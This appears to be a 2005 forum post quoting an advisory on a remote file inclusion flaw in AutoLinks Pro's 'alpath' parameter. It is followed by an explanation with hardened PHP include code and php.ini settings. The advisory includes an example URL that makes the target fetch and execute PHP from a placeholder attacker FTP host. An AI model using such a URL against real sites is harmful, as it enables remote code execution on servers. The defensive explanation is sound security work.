09-04-2005, 01:48 PM
stevo
Confirmed User
 
Join Date: Aug 2002
Location: Orlando, Florida
Posts: 2,051
Description: A vulnerability was reported in AutoLinks Pro. A remote user can execute arbitrary code on the target system.

The software does not properly validate user-supplied input in the 'alpath' parameter. If register_globals is set to 'on' in the 'php.ini' configuration file, a remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

The flaw resides in 'autolinks/al_initialize.php'.

http://[target]/al_initialize.php?alpath=ftp://[attacker]/

The above URL will cause the PHP code in the 'al_functions.php' file on the 'attacker' FTP site to be executed on the target system.


What's your website?

Last edited by stevo; 09-04-2005 at 01:50 PM..
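The advisory quoted in the post describes the classic register_globals remote file inclusion shape: a variable that is supposed to hold the install directory is taken straight from the query string and concatenated into an include. The block below is an added example, not code from the post and not AutoLinks Pro's actual source (the page does not show it); the vulnerable include line is a reconstruction assumed from the advisory's description, and `safe_include_path` is a hypothetical helper name. It shows the assumed vulnerable form beside a hardened form that keeps working even on a host where register_globals is still on.

```php
<?php
// Added example (not AutoLinks Pro's code). The vulnerable shape is an
// assumption reconstructed from the advisory text, not the real source.

// --- Assumed vulnerable shape ---
// With register_globals = On, a request for
//   al_initialize.php?alpath=ftp://[attacker]/
// makes PHP create $alpath = "ftp://[attacker]/" before this line runs, so
// the URL wrapper fetches ftp://[attacker]/al_functions.php and PHP executes
// whatever it contains, as the web server user:
//
//     include($alpath . 'al_functions.php');

// --- Hardened shape ---
// The include root is assigned server-side (so an injected $alpath is simply
// overwritten), and a helper refuses anything that is not a plain file
// located under that root. Helper name is hypothetical.

function safe_include_path($base, $relative)
{
    // Refuse stream wrappers (ftp://, http://, php://, data:, ...) and NUL
    // bytes before touching the filesystem at all.
    if (preg_match('#^[a-z][a-z0-9+.\-]*:#i', $relative)
        || strpos($relative, "\0") !== false) {
        return false;
    }

    $base_real = realpath($base);
    $candidate = realpath($base . DIRECTORY_SEPARATOR . $relative);
    if ($base_real === false || $candidate === false) {
        return false;          // missing file or unresolvable base
    }

    // Containment check: realpath has already collapsed any ../ segments,
    // so the resolved file must still sit inside the base directory.
    $base_real = rtrim($base_real, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strpos($candidate, $base_real) !== 0) {
        return false;
    }
    return $candidate;
}

// Explicit assignment: this value wins regardless of ?alpath= in the URL.
// dirname(__FILE__) is used rather than __DIR__ so it also runs on PHP 4/5.x.
$alpath = dirname(__FILE__);

$functions = safe_include_path($alpath, 'al_functions.php');
if ($functions === false) {
    header('HTTP/1.0 500 Internal Server Error');
    exit('AutoLinks: library file not found');
}
require_once $functions;
```

Two php.ini settings belong next to this fix: `register_globals = Off` removes the injection vector entirely, and `allow_url_fopen = Off` (or, on PHP 5.2 and later, `allow_url_include = Off`, which disables remote includes without also breaking ordinary remote fopen calls) stops the include from ever reaching an FTP or HTTP URL even if a future code path does pass untrusted data into it. The helper's scheme check is deliberately a deny on any `scheme:` prefix rather than a list of known wrappers, because PHP ships more wrappers than the three the advisory mentions.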